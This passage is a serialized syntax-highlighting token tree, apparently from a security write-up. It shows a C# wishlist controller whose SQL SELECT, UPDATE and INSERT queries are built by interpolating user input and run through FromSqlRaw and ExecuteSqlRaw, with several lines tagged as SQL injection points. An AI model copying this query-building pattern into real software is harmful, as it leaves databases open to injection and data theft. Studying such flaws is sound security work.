5,"children":35186},{"style":1576},[35187],{"type":38,"value":35127},{"type":33,"tag":128,"props":35189,"children":35190},{"style":135},[35191],{"type":38,"value":35192}," sqlQueryGetWishlist",{"type":33,"tag":128,"props":35194,"children":35195},{"style":312},[35196],{"type":38,"value":5657},{"type":33,"tag":128,"props":35198,"children":35199},{"style":676},[35200],{"type":38,"value":35201}," $\"",{"type":33,"tag":128,"props":35203,"children":35204},{"style":140},[35205],{"type":38,"value":35206},"SELECT * from Wishlist WHERE ID='",{"type":33,"tag":128,"props":35208,"children":35209},{"style":312},[35210],{"type":38,"value":7246},{"type":33,"tag":128,"props":35212,"children":35213},{"style":140},[35214],{"type":38,"value":35163},{"type":33,"tag":128,"props":35216,"children":35217},{"style":312},[35218],{"type":38,"value":5730},{"type":33,"tag":128,"props":35220,"children":35221},{"style":140},[35222],{"type":38,"value":6040},{"type":33,"tag":128,"props":35224,"children":35225},{"style":676},[35226],{"type":38,"value":669},{"type":33,"tag":128,"props":35228,"children":35229},{"style":312},[35230],{"type":38,"value":35231},";",{"type":33,"tag":128,"props":35233,"children":35234},{"style":5541},[35235],{"type":38,"value":35236}," // \u003C--- SQLI\n",{"type":33,"tag":128,"props":35238,"children":35239},{"class":130,"line":804},[35240],{"type":33,"tag":128,"props":35241,"children":35242},{"emptyLinePlaceholder":896},[35243],{"type":38,"value":899},{"type":33,"tag":128,"props":35245,"children":35246},{"class":130,"line":839},[35247,35252,35257,35261],{"type":33,"tag":128,"props":35248,"children":35249},{"style":312},[35250],{"type":38,"value":35251},"    
[",{"type":33,"tag":128,"props":35253,"children":35254},{"style":300},[35255],{"type":38,"value":35256},"..",{"type":33,"tag":128,"props":35258,"children":35259},{"style":323},[35260],{"type":38,"value":215},{"type":33,"tag":128,"props":35262,"children":35263},{"style":312},[35264],{"type":38,"value":3262},{"type":33,"tag":128,"props":35266,"children":35267},{"class":130,"line":848},[35268],{"type":33,"tag":128,"props":35269,"children":35270},{"style":312},[35271],{"type":38,"value":854},{"type":33,"tag":128,"props":35273,"children":35274},{"class":130,"line":976},[35275,35279,35283],{"type":33,"tag":128,"props":35276,"children":35277},{"style":312},[35278],{"type":38,"value":344},{"type":33,"tag":128,"props":35280,"children":35281},{"style":323},[35282],{"type":38,"value":29750},{"type":33,"tag":128,"props":35284,"children":35285},{"style":312},[35286],{"type":38,"value":3262},{"type":33,"tag":128,"props":35288,"children":35289},{"class":130,"line":988},[35290],{"type":33,"tag":128,"props":35291,"children":35292},{"emptyLinePlaceholder":896},[35293],{"type":38,"value":899},{"type":33,"tag":128,"props":35295,"children":35296},{"class":130,"line":1001},[35297,35301,35305,35309,35313,35318,35322,35326,35331,35336],{"type":33,"tag":128,"props":35298,"children":35299},{"style":300},[35300],{"type":38,"value":25953},{"type":33,"tag":128,"props":35302,"children":35303},{"style":30339},[35304],{"type":38,"value":35103},{"type":33,"tag":128,"props":35306,"children":35307},{"style":135},[35308],{"type":38,"value":35108},{"type":33,"tag":128,"props":35310,"children":35311},{"style":312},[35312],{"type":38,"value":5566},{"type":33,"tag":128,"props":35314,"children":35315},{"style":1576},[35316],{"type":38,"value":35317},"string",{"type":33,"tag":128,"props":35319,"children":35320},{"style":135},[35321],{"type":38,"value":14688},{"type":33,"tag":128,"props":35323,"children":35324},{"style":312},[35325],{"type":38,"value":5584},{"type":33,"tag":128,"props":35327,"children":35328
},{"style":1576},[35329],{"type":38,"value":35330}," string",{"type":33,"tag":128,"props":35332,"children":35333},{"style":135},[35334],{"type":38,"value":35335}," sellerName",{"type":33,"tag":128,"props":35337,"children":35338},{"style":312},[35339],{"type":38,"value":2427},{"type":33,"tag":128,"props":35341,"children":35342},{"class":130,"line":1014},[35343],{"type":33,"tag":128,"props":35344,"children":35345},{"style":312},[35346],{"type":38,"value":650},{"type":33,"tag":128,"props":35348,"children":35349},{"class":130,"line":1026},[35350,35354,35358,35362,35366,35370,35374,35378,35382,35386,35390,35394,35398],{"type":33,"tag":128,"props":35351,"children":35352},{"style":1576},[35353],{"type":38,"value":35127},{"type":33,"tag":128,"props":35355,"children":35356},{"style":135},[35357],{"type":38,"value":35132},{"type":33,"tag":128,"props":35359,"children":35360},{"style":312},[35361],{"type":38,"value":5657},{"type":33,"tag":128,"props":35363,"children":35364},{"style":306},[35365],{"type":38,"value":35141},{"type":33,"tag":128,"props":35367,"children":35368},{"style":312},[35369],{"type":38,"value":215},{"type":33,"tag":128,"props":35371,"children":35372},{"style":306},[35373],{"type":38,"value":35150},{"type":33,"tag":128,"props":35375,"children":35376},{"style":312},[35377],{"type":38,"value":344},{"type":33,"tag":128,"props":35379,"children":35380},{"style":676},[35381],{"type":38,"value":669},{"type":33,"tag":128,"props":35383,"children":35384},{"style":140},[35385],{"type":38,"value":35163},{"type":33,"tag":128,"props":35387,"children":35388},{"style":676},[35389],{"type":38,"value":669},{"type":33,"tag":128,"props":35391,"children":35392},{"style":312},[35393],{"type":38,"value":8230},{"type":33,"tag":128,"props":35395,"children":35396},{"style":135},[35397],{"type":38,"value":35176},{"type":33,"tag":128,"props":35399,"children":35400},{"style":312},[35401],{"type":38,"value":15496},{"type":33,"tag":128,"props":35403,"children":35404},{"class":130,"line":10
38},[35405,35409,35413,35417,35421,35426,35430,35434,35438,35442,35446],{"type":33,"tag":128,"props":35406,"children":35407},{"style":1576},[35408],{"type":38,"value":35127},{"type":33,"tag":128,"props":35410,"children":35411},{"style":135},[35412],{"type":38,"value":35192},{"type":33,"tag":128,"props":35414,"children":35415},{"style":312},[35416],{"type":38,"value":5657},{"type":33,"tag":128,"props":35418,"children":35419},{"style":676},[35420],{"type":38,"value":35201},{"type":33,"tag":128,"props":35422,"children":35423},{"style":140},[35424],{"type":38,"value":35425},"SELECT * from Wishlist WHERE ID=",{"type":33,"tag":128,"props":35427,"children":35428},{"style":312},[35429],{"type":38,"value":7246},{"type":33,"tag":128,"props":35431,"children":35432},{"style":140},[35433],{"type":38,"value":35163},{"type":33,"tag":128,"props":35435,"children":35436},{"style":312},[35437],{"type":38,"value":5730},{"type":33,"tag":128,"props":35439,"children":35440},{"style":676},[35441],{"type":38,"value":669},{"type":33,"tag":128,"props":35443,"children":35444},{"style":312},[35445],{"type":38,"value":35231},{"type":33,"tag":128,"props":35447,"children":35448},{"style":5541},[35449],{"type":38,"value":35236},{"type":33,"tag":128,"props":35451,"children":35452},{"class":130,"line":1051},[35453,35458,35463,35467,35472,35476,35481,35485,35490,35494,35499,35503,35508],{"type":33,"tag":128,"props":35454,"children":35455},{"style":300},[35456],{"type":38,"value":35457},"    var",{"type":33,"tag":128,"props":35459,"children":35460},{"style":135},[35461],{"type":38,"value":35462}," wishlist",{"type":33,"tag":128,"props":35464,"children":35465},{"style":312},[35466],{"type":38,"value":5657},{"type":33,"tag":128,"props":35468,"children":35469},{"style":306},[35470],{"type":38,"value":35471}," 
_db",{"type":33,"tag":128,"props":35473,"children":35474},{"style":312},[35475],{"type":38,"value":215},{"type":33,"tag":128,"props":35477,"children":35478},{"style":306},[35479],{"type":38,"value":35480},"Wishlist",{"type":33,"tag":128,"props":35482,"children":35483},{"style":312},[35484],{"type":38,"value":215},{"type":33,"tag":128,"props":35486,"children":35487},{"style":135},[35488],{"type":38,"value":35489},"FromSqlRaw",{"type":33,"tag":128,"props":35491,"children":35492},{"style":312},[35493],{"type":38,"value":5566},{"type":33,"tag":128,"props":35495,"children":35496},{"style":306},[35497],{"type":38,"value":35498},"sqlQueryGetWishlist",{"type":33,"tag":128,"props":35500,"children":35501},{"style":312},[35502],{"type":38,"value":6700},{"type":33,"tag":128,"props":35504,"children":35505},{"style":135},[35506],{"type":38,"value":35507},"FirstOrDefault",{"type":33,"tag":128,"props":35509,"children":35510},{"style":312},[35511],{"type":38,"value":15496},{"type":33,"tag":128,"props":35513,"children":35514},{"class":130,"line":1063},[35515,35519,35524,35528,35532,35537,35541,35545,35549,35554,35558,35563,35567,35571,35575,35579],{"type":33,"tag":128,"props":35516,"children":35517},{"style":1576},[35518],{"type":38,"value":35127},{"type":33,"tag":128,"props":35520,"children":35521},{"style":135},[35522],{"type":38,"value":35523}," sqlQueryProduct",{"type":33,"tag":128,"props":35525,"children":35526},{"style":312},[35527],{"type":38,"value":5657},{"type":33,"tag":128,"props":35529,"children":35530},{"style":676},[35531],{"type":38,"value":35201},{"type":33,"tag":128,"props":35533,"children":35534},{"style":140},[35535],{"type":38,"value":35536},"SELECT * from Products WHERE 
name='",{"type":33,"tag":128,"props":35538,"children":35539},{"style":312},[35540],{"type":38,"value":7246},{"type":33,"tag":128,"props":35542,"children":35543},{"style":140},[35544],{"type":38,"value":12126},{"type":33,"tag":128,"props":35546,"children":35547},{"style":312},[35548],{"type":38,"value":5730},{"type":33,"tag":128,"props":35550,"children":35551},{"style":140},[35552],{"type":38,"value":35553},"' AND sellerName='",{"type":33,"tag":128,"props":35555,"children":35556},{"style":312},[35557],{"type":38,"value":7246},{"type":33,"tag":128,"props":35559,"children":35560},{"style":140},[35561],{"type":38,"value":35562},"sellerName",{"type":33,"tag":128,"props":35564,"children":35565},{"style":312},[35566],{"type":38,"value":5730},{"type":33,"tag":128,"props":35568,"children":35569},{"style":140},[35570],{"type":38,"value":6040},{"type":33,"tag":128,"props":35572,"children":35573},{"style":676},[35574],{"type":38,"value":669},{"type":33,"tag":128,"props":35576,"children":35577},{"style":312},[35578],{"type":38,"value":35231},{"type":33,"tag":128,"props":35580,"children":35581},{"style":5541},[35582],{"type":38,"value":35236},{"type":33,"tag":128,"props":35584,"children":35585},{"class":130,"line":1076},[35586,35590,35595,35599,35603,35607,35612,35616,35620,35624,35629,35633,35637],{"type":33,"tag":128,"props":35587,"children":35588},{"style":300},[35589],{"type":38,"value":35457},{"type":33,"tag":128,"props":35591,"children":35592},{"style":135},[35593],{"type":38,"value":35594}," 
product",{"type":33,"tag":128,"props":35596,"children":35597},{"style":312},[35598],{"type":38,"value":5657},{"type":33,"tag":128,"props":35600,"children":35601},{"style":306},[35602],{"type":38,"value":35471},{"type":33,"tag":128,"props":35604,"children":35605},{"style":312},[35606],{"type":38,"value":215},{"type":33,"tag":128,"props":35608,"children":35609},{"style":306},[35610],{"type":38,"value":35611},"Products",{"type":33,"tag":128,"props":35613,"children":35614},{"style":312},[35615],{"type":38,"value":215},{"type":33,"tag":128,"props":35617,"children":35618},{"style":135},[35619],{"type":38,"value":35489},{"type":33,"tag":128,"props":35621,"children":35622},{"style":312},[35623],{"type":38,"value":5566},{"type":33,"tag":128,"props":35625,"children":35626},{"style":306},[35627],{"type":38,"value":35628},"sqlQueryProduct",{"type":33,"tag":128,"props":35630,"children":35631},{"style":312},[35632],{"type":38,"value":6700},{"type":33,"tag":128,"props":35634,"children":35635},{"style":135},[35636],{"type":38,"value":35507},{"type":33,"tag":128,"props":35638,"children":35639},{"style":312},[35640],{"type":38,"value":15496},{"type":33,"tag":128,"props":35642,"children":35643},{"class":130,"line":1089},[35644,35648,35652,35656,35660,35664,35669,35673,35678,35682,35686],{"type":33,"tag":128,"props":35645,"children":35646},{"style":1576},[35647],{"type":38,"value":6625},{"type":33,"tag":128,"props":35649,"children":35650},{"style":312},[35651],{"type":38,"value":5566},{"type":33,"tag":128,"props":35653,"children":35654},{"style":300},[35655],{"type":38,"value":16424},{"type":33,"tag":128,"props":35657,"children":35658},{"style":1576},[35659],{"type":38,"value":35317},{"type":33,"tag":128,"props":35661,"children":35662},{"style":312},[35663],{"type":38,"value":215},{"type":33,"tag":128,"props":35665,"children":35666},{"style":135},[35667],{"type":38,"value":35668},"IsNullOrEmpty",{"type":33,"tag":128,"props":35670,"children":35671},{"style":312},[35672],{"type":38,"valu
e":5566},{"type":33,"tag":128,"props":35674,"children":35675},{"style":306},[35676],{"type":38,"value":35677},"product",{"type":33,"tag":128,"props":35679,"children":35680},{"style":312},[35681],{"type":38,"value":215},{"type":33,"tag":128,"props":35683,"children":35684},{"style":306},[35685],{"type":38,"value":12126},{"type":33,"tag":128,"props":35687,"children":35688},{"style":312},[35689],{"type":38,"value":2459},{"type":33,"tag":128,"props":35691,"children":35692},{"class":130,"line":1101},[35693],{"type":33,"tag":128,"props":35694,"children":35695},{"style":312},[35696],{"type":38,"value":12699},{"type":33,"tag":128,"props":35698,"children":35699},{"class":130,"line":1114},[35700,35704,35708,35713,35718,35723,35727,35732,35736,35740,35744,35748,35752,35756,35760],{"type":33,"tag":128,"props":35701,"children":35702},{"style":1576},[35703],{"type":38,"value":15223},{"type":33,"tag":128,"props":35705,"children":35706},{"style":312},[35707],{"type":38,"value":2852},{"type":33,"tag":128,"props":35709,"children":35710},{"style":306},[35711],{"type":38,"value":35712},"wishlist",{"type":33,"tag":128,"props":35714,"children":35715},{"style":300},[35716],{"type":38,"value":35717}," !=",{"type":33,"tag":128,"props":35719,"children":35720},{"style":300},[35721],{"type":38,"value":35722}," null",{"type":33,"tag":128,"props":35724,"children":35725},{"style":300},[35726],{"type":38,"value":10037},{"type":33,"tag":128,"props":35728,"children":35729},{"style":300},[35730],{"type":38,"value":35731}," 
!",{"type":33,"tag":128,"props":35733,"children":35734},{"style":1576},[35735],{"type":38,"value":35317},{"type":33,"tag":128,"props":35737,"children":35738},{"style":312},[35739],{"type":38,"value":215},{"type":33,"tag":128,"props":35741,"children":35742},{"style":135},[35743],{"type":38,"value":35668},{"type":33,"tag":128,"props":35745,"children":35746},{"style":312},[35747],{"type":38,"value":5566},{"type":33,"tag":128,"props":35749,"children":35750},{"style":306},[35751],{"type":38,"value":35712},{"type":33,"tag":128,"props":35753,"children":35754},{"style":312},[35755],{"type":38,"value":215},{"type":33,"tag":128,"props":35757,"children":35758},{"style":306},[35759],{"type":38,"value":2815},{"type":33,"tag":128,"props":35761,"children":35762},{"style":312},[35763],{"type":38,"value":2459},{"type":33,"tag":128,"props":35765,"children":35766},{"class":130,"line":1127},[35767],{"type":33,"tag":128,"props":35768,"children":35769},{"style":312},[35770],{"type":38,"value":35771},"        {\n",{"type":33,"tag":128,"props":35773,"children":35774},{"class":130,"line":1139},[35775,35780,35784,35789,35793,35798,35802,35807,35811,35816,35820,35824,35828,35832],{"type":33,"tag":128,"props":35776,"children":35777},{"style":30339},[35778],{"type":38,"value":35779},"            List",{"type":33,"tag":128,"props":35781,"children":35782},{"style":312},[35783],{"type":38,"value":5977},{"type":33,"tag":128,"props":35785,"children":35786},{"style":30339},[35787],{"type":38,"value":35788},"ProductModel",{"type":33,"tag":128,"props":35790,"children":35791},{"style":312},[35792],{"type":38,"value":6054},{"type":33,"tag":128,"props":35794,"children":35795},{"style":135},[35796],{"type":38,"value":35797}," products",{"type":33,"tag":128,"props":35799,"children":35800},{"style":312},[35801],{"type":38,"value":5657},{"type":33,"tag":128,"props":35803,"children":35804},{"style":306},[35805],{"type":38,"value":35806}," 
SerializeHelper",{"type":33,"tag":128,"props":35808,"children":35809},{"style":312},[35810],{"type":38,"value":215},{"type":33,"tag":128,"props":35812,"children":35813},{"style":135},[35814],{"type":38,"value":35815},"Deserialize",{"type":33,"tag":128,"props":35817,"children":35818},{"style":312},[35819],{"type":38,"value":5566},{"type":33,"tag":128,"props":35821,"children":35822},{"style":306},[35823],{"type":38,"value":35712},{"type":33,"tag":128,"props":35825,"children":35826},{"style":312},[35827],{"type":38,"value":215},{"type":33,"tag":128,"props":35829,"children":35830},{"style":306},[35831],{"type":38,"value":2815},{"type":33,"tag":128,"props":35833,"children":35834},{"style":312},[35835],{"type":38,"value":5815},{"type":33,"tag":128,"props":35837,"children":35838},{"class":130,"line":1152},[35839,35844,35849,35853,35857,35861,35866,35870,35874,35878,35883,35887,35891,35895,35899,35903,35907],{"type":33,"tag":128,"props":35840,"children":35841},{"style":30339},[35842],{"type":38,"value":35843},"            ProductModel",{"type":33,"tag":128,"props":35845,"children":35846},{"style":135},[35847],{"type":38,"value":35848}," result",{"type":33,"tag":128,"props":35850,"children":35851},{"style":312},[35852],{"type":38,"value":5657},{"type":33,"tag":128,"props":35854,"children":35855},{"style":306},[35856],{"type":38,"value":35797},{"type":33,"tag":128,"props":35858,"children":35859},{"style":312},[35860],{"type":38,"value":215},{"type":33,"tag":128,"props":35862,"children":35863},{"style":135},[35864],{"type":38,"value":35865},"Find",{"type":33,"tag":128,"props":35867,"children":35868},{"style":312},[35869],{"type":38,"value":5566},{"type":33,"tag":128,"props":35871,"children":35872},{"style":135},[35873],{"type":38,"value":32413},{"type":33,"tag":128,"props":35875,"children":35876},{"style":300},[35877],{"type":38,"value":5625},{"type":33,"tag":128,"props":35879,"children":35880},{"style":306},[35881],{"type":38,"value":35882}," 
x",{"type":33,"tag":128,"props":35884,"children":35885},{"style":312},[35886],{"type":38,"value":215},{"type":33,"tag":128,"props":35888,"children":35889},{"style":306},[35890],{"type":38,"value":12126},{"type":33,"tag":128,"props":35892,"children":35893},{"style":300},[35894],{"type":38,"value":11001},{"type":33,"tag":128,"props":35896,"children":35897},{"style":306},[35898],{"type":38,"value":35594},{"type":33,"tag":128,"props":35900,"children":35901},{"style":312},[35902],{"type":38,"value":215},{"type":33,"tag":128,"props":35904,"children":35905},{"style":306},[35906],{"type":38,"value":12126},{"type":33,"tag":128,"props":35908,"children":35909},{"style":312},[35910],{"type":38,"value":5815},{"type":33,"tag":128,"props":35912,"children":35913},{"class":130,"line":1165},[35914],{"type":33,"tag":128,"props":35915,"children":35916},{"emptyLinePlaceholder":896},[35917],{"type":38,"value":899},{"type":33,"tag":128,"props":35919,"children":35920},{"class":130,"line":1177},[35921,35926,35930,35935,35939,35943],{"type":33,"tag":128,"props":35922,"children":35923},{"style":1576},[35924],{"type":38,"value":35925},"            if",{"type":33,"tag":128,"props":35927,"children":35928},{"style":312},[35929],{"type":38,"value":2852},{"type":33,"tag":128,"props":35931,"children":35932},{"style":306},[35933],{"type":38,"value":35934},"result",{"type":33,"tag":128,"props":35936,"children":35937},{"style":300},[35938],{"type":38,"value":35717},{"type":33,"tag":128,"props":35940,"children":35941},{"style":300},[35942],{"type":38,"value":35722},{"type":33,"tag":128,"props":35944,"children":35945},{"style":312},[35946],{"type":38,"value":2427},{"type":33,"tag":128,"props":35948,"children":35949},{"class":130,"line":1189},[35950],{"type":33,"tag":128,"props":35951,"children":35952},{"style":312},[35953],{"type":38,"value":35954},"            
{\n",{"type":33,"tag":128,"props":35956,"children":35957},{"class":130,"line":1202},[35958,35963,35968,35972,35976,35981,35985],{"type":33,"tag":128,"props":35959,"children":35960},{"style":1576},[35961],{"type":38,"value":35962},"                return",{"type":33,"tag":128,"props":35964,"children":35965},{"style":135},[35966],{"type":38,"value":35967}," Content",{"type":33,"tag":128,"props":35969,"children":35970},{"style":312},[35971],{"type":38,"value":5566},{"type":33,"tag":128,"props":35973,"children":35974},{"style":676},[35975],{"type":38,"value":669},{"type":33,"tag":128,"props":35977,"children":35978},{"style":140},[35979],{"type":38,"value":35980},"Product already exists",{"type":33,"tag":128,"props":35982,"children":35983},{"style":676},[35984],{"type":38,"value":669},{"type":33,"tag":128,"props":35986,"children":35987},{"style":312},[35988],{"type":38,"value":5815},{"type":33,"tag":128,"props":35990,"children":35991},{"class":130,"line":1214},[35992],{"type":33,"tag":128,"props":35993,"children":35994},{"style":312},[35995],{"type":38,"value":35996},"            }\n",{"type":33,"tag":128,"props":35998,"children":35999},{"class":130,"line":1226},[36000],{"type":33,"tag":128,"props":36001,"children":36002},{"emptyLinePlaceholder":896},[36003],{"type":38,"value":899},{"type":33,"tag":128,"props":36005,"children":36006},{"class":130,"line":1239},[36007,36012,36016,36021,36025,36029],{"type":33,"tag":128,"props":36008,"children":36009},{"style":306},[36010],{"type":38,"value":36011},"            
products",{"type":33,"tag":128,"props":36013,"children":36014},{"style":312},[36015],{"type":38,"value":215},{"type":33,"tag":128,"props":36017,"children":36018},{"style":135},[36019],{"type":38,"value":36020},"Add",{"type":33,"tag":128,"props":36022,"children":36023},{"style":312},[36024],{"type":38,"value":5566},{"type":33,"tag":128,"props":36026,"children":36027},{"style":306},[36028],{"type":38,"value":35677},{"type":33,"tag":128,"props":36030,"children":36031},{"style":312},[36032],{"type":38,"value":5815},{"type":33,"tag":128,"props":36034,"children":36035},{"class":130,"line":1251},[36036,36041,36046,36050,36054,36058,36063,36067,36072],{"type":33,"tag":128,"props":36037,"children":36038},{"style":1576},[36039],{"type":38,"value":36040},"            string",{"type":33,"tag":128,"props":36042,"children":36043},{"style":135},[36044],{"type":38,"value":36045}," serializedData",{"type":33,"tag":128,"props":36047,"children":36048},{"style":312},[36049],{"type":38,"value":5657},{"type":33,"tag":128,"props":36051,"children":36052},{"style":306},[36053],{"type":38,"value":35806},{"type":33,"tag":128,"props":36055,"children":36056},{"style":312},[36057],{"type":38,"value":215},{"type":33,"tag":128,"props":36059,"children":36060},{"style":135},[36061],{"type":38,"value":36062},"Serialize",{"type":33,"tag":128,"props":36064,"children":36065},{"style":312},[36066],{"type":38,"value":5566},{"type":33,"tag":128,"props":36068,"children":36069},{"style":306},[36070],{"type":38,"value":36071},"products",{"type":33,"tag":128,"props":36073,"children":36074},{"style":312},[36075],{"type":38,"value":5815},{"type":33,"tag":128,"props":36077,"children":36078},{"class":130,"line":1263},[36079,36083,36088,36092,36096,36101,36105,36110,36114,36119,36123,36127,36131,36135,36139],{"type":33,"tag":128,"props":36080,"children":36081},{"style":1576},[36082],{"type":38,"value":36040},{"type":33,"tag":128,"props":36084,"children":36085},{"style":135},[36086],{"type":38,"value":36087}," 
sqlQueryAddWishlist",{"type":33,"tag":128,"props":36089,"children":36090},{"style":312},[36091],{"type":38,"value":5657},{"type":33,"tag":128,"props":36093,"children":36094},{"style":676},[36095],{"type":38,"value":35201},{"type":33,"tag":128,"props":36097,"children":36098},{"style":140},[36099],{"type":38,"value":36100},"UPDATE Wishlist SET data='",{"type":33,"tag":128,"props":36102,"children":36103},{"style":312},[36104],{"type":38,"value":7246},{"type":33,"tag":128,"props":36106,"children":36107},{"style":140},[36108],{"type":38,"value":36109},"serializedData",{"type":33,"tag":128,"props":36111,"children":36112},{"style":312},[36113],{"type":38,"value":5730},{"type":33,"tag":128,"props":36115,"children":36116},{"style":140},[36117],{"type":38,"value":36118},"' WHERE ID=",{"type":33,"tag":128,"props":36120,"children":36121},{"style":312},[36122],{"type":38,"value":7246},{"type":33,"tag":128,"props":36124,"children":36125},{"style":140},[36126],{"type":38,"value":35163},{"type":33,"tag":128,"props":36128,"children":36129},{"style":312},[36130],{"type":38,"value":5730},{"type":33,"tag":128,"props":36132,"children":36133},{"style":676},[36134],{"type":38,"value":669},{"type":33,"tag":128,"props":36136,"children":36137},{"style":312},[36138],{"type":38,"value":35231},{"type":33,"tag":128,"props":36140,"children":36141},{"style":5541},[36142],{"type":38,"value":35236},{"type":33,"tag":128,"props":36144,"children":36145},{"class":130,"line":1276},[36146,36151,36155,36160,36164,36169,36173,36178],{"type":33,"tag":128,"props":36147,"children":36148},{"style":306},[36149],{"type":38,"value":36150},"            
_db",{"type":33,"tag":128,"props":36152,"children":36153},{"style":312},[36154],{"type":38,"value":215},{"type":33,"tag":128,"props":36156,"children":36157},{"style":306},[36158],{"type":38,"value":36159},"Database",{"type":33,"tag":128,"props":36161,"children":36162},{"style":312},[36163],{"type":38,"value":215},{"type":33,"tag":128,"props":36165,"children":36166},{"style":135},[36167],{"type":38,"value":36168},"ExecuteSqlRaw",{"type":33,"tag":128,"props":36170,"children":36171},{"style":312},[36172],{"type":38,"value":5566},{"type":33,"tag":128,"props":36174,"children":36175},{"style":306},[36176],{"type":38,"value":36177},"sqlQueryAddWishlist",{"type":33,"tag":128,"props":36179,"children":36180},{"style":312},[36181],{"type":38,"value":5815},{"type":33,"tag":128,"props":36183,"children":36184},{"class":130,"line":1288},[36185],{"type":33,"tag":128,"props":36186,"children":36187},{"style":312},[36188],{"type":38,"value":15318},{"type":33,"tag":128,"props":36190,"children":36191},{"class":130,"line":1300},[36192],{"type":33,"tag":128,"props":36193,"children":36194},{"style":1576},[36195],{"type":38,"value":36196},"        else\n",{"type":33,"tag":128,"props":36198,"children":36199},{"class":130,"line":1313},[36200],{"type":33,"tag":128,"props":36201,"children":36202},{"style":312},[36203],{"type":38,"value":35771},{"type":33,"tag":128,"props":36205,"children":36206},{"class":130,"line":1327},[36207,36211,36216,36220,36224,36228,36232,36236,36240,36244,36248,36252,36256],{"type":33,"tag":128,"props":36208,"children":36209},{"style":1576},[36210],{"type":38,"value":36040},{"type":33,"tag":128,"props":36212,"children":36213},{"style":135},[36214],{"type":38,"value":36215}," 
username",{"type":33,"tag":128,"props":36217,"children":36218},{"style":312},[36219],{"type":38,"value":5657},{"type":33,"tag":128,"props":36221,"children":36222},{"style":306},[36223],{"type":38,"value":35141},{"type":33,"tag":128,"props":36225,"children":36226},{"style":312},[36227],{"type":38,"value":215},{"type":33,"tag":128,"props":36229,"children":36230},{"style":306},[36231],{"type":38,"value":35150},{"type":33,"tag":128,"props":36233,"children":36234},{"style":312},[36235],{"type":38,"value":344},{"type":33,"tag":128,"props":36237,"children":36238},{"style":676},[36239],{"type":38,"value":669},{"type":33,"tag":128,"props":36241,"children":36242},{"style":140},[36243],{"type":38,"value":29798},{"type":33,"tag":128,"props":36245,"children":36246},{"style":676},[36247],{"type":38,"value":669},{"type":33,"tag":128,"props":36249,"children":36250},{"style":312},[36251],{"type":38,"value":8230},{"type":33,"tag":128,"props":36253,"children":36254},{"style":135},[36255],{"type":38,"value":35176},{"type":33,"tag":128,"props":36257,"children":36258},{"style":312},[36259],{"type":38,"value":15496},{"type":33,"tag":128,"props":36261,"children":36262},{"class":130,"line":11196},[36263,36267,36271,36275,36279,36284,36288,36292,36297,36301,36305],{"type":33,"tag":128,"props":36264,"children":36265},{"style":30339},[36266],{"type":38,"value":35779},{"type":33,"tag":128,"props":36268,"children":36269},{"style":312},[36270],{"type":38,"value":5977},{"type":33,"tag":128,"props":36272,"children":36273},{"style":30339},[36274],{"type":38,"value":35788},{"type":33,"tag":128,"props":36276,"children":36277},{"style":312},[36278],{"type":38,"value":6054},{"type":33,"tag":128,"props":36280,"children":36281},{"style":135},[36282],{"type":38,"value":36283}," 
wishListProducts",{"type":33,"tag":128,"props":36285,"children":36286},{"style":312},[36287],{"type":38,"value":5657},{"type":33,"tag":128,"props":36289,"children":36290},{"style":300},[36291],{"type":38,"value":13061},{"type":33,"tag":128,"props":36293,"children":36294},{"style":30339},[36295],{"type":38,"value":36296}," List",{"type":33,"tag":128,"props":36298,"children":36299},{"style":312},[36300],{"type":38,"value":5977},{"type":33,"tag":128,"props":36302,"children":36303},{"style":30339},[36304],{"type":38,"value":35788},{"type":33,"tag":128,"props":36306,"children":36307},{"style":312},[36308],{"type":38,"value":36309},">();\n",{"type":33,"tag":128,"props":36311,"children":36312},{"class":130,"line":11204},[36313,36318,36322,36326,36330,36334],{"type":33,"tag":128,"props":36314,"children":36315},{"style":306},[36316],{"type":38,"value":36317},"            wishListProducts",{"type":33,"tag":128,"props":36319,"children":36320},{"style":312},[36321],{"type":38,"value":215},{"type":33,"tag":128,"props":36323,"children":36324},{"style":135},[36325],{"type":38,"value":36020},{"type":33,"tag":128,"props":36327,"children":36328},{"style":312},[36329],{"type":38,"value":5566},{"type":33,"tag":128,"props":36331,"children":36332},{"style":306},[36333],{"type":38,"value":35677},{"type":33,"tag":128,"props":36335,"children":36336},{"style":312},[36337],{"type":38,"value":5815},{"type":33,"tag":128,"props":36339,"children":36340},{"class":130,"line":11213},[36341,36345,36349,36353,36357,36361,36365,36369,36374],{"type":33,"tag":128,"props":36342,"children":36343},{"style":1576},[36344],{"type":38,"value":36040},{"type":33,"tag":128,"props":36346,"children":36347},{"style":135},[36348],{"type":38,"value":36045},{"type":33,"tag":128,"props":36350,"children":36351},{"style":312},[36352],{"type":38,"value":5657},{"type":33,"tag":128,"props":36354,"children":36355},{"style":306},[36356],{"type":38,"value":35806},{"type":33,"tag":128,"props":36358,"children":36359},{"style":312}
,[36360],{"type":38,"value":215},{"type":33,"tag":128,"props":36362,"children":36363},{"style":135},[36364],{"type":38,"value":36062},{"type":33,"tag":128,"props":36366,"children":36367},{"style":312},[36368],{"type":38,"value":5566},{"type":33,"tag":128,"props":36370,"children":36371},{"style":306},[36372],{"type":38,"value":36373},"wishListProducts",{"type":33,"tag":128,"props":36375,"children":36376},{"style":312},[36377],{"type":38,"value":5815},{"type":33,"tag":128,"props":36379,"children":36380},{"class":130,"line":11250},[36381,36385,36389,36393,36397,36402,36406,36410,36414,36419,36423,36427,36431,36436,36440,36444,36448,36453,36457,36461],{"type":33,"tag":128,"props":36382,"children":36383},{"style":1576},[36384],{"type":38,"value":36040},{"type":33,"tag":128,"props":36386,"children":36387},{"style":135},[36388],{"type":38,"value":36087},{"type":33,"tag":128,"props":36390,"children":36391},{"style":312},[36392],{"type":38,"value":5657},{"type":33,"tag":128,"props":36394,"children":36395},{"style":676},[36396],{"type":38,"value":35201},{"type":33,"tag":128,"props":36398,"children":36399},{"style":140},[36400],{"type":38,"value":36401},"INSERT INTO Wishlist(ID, username, data) 
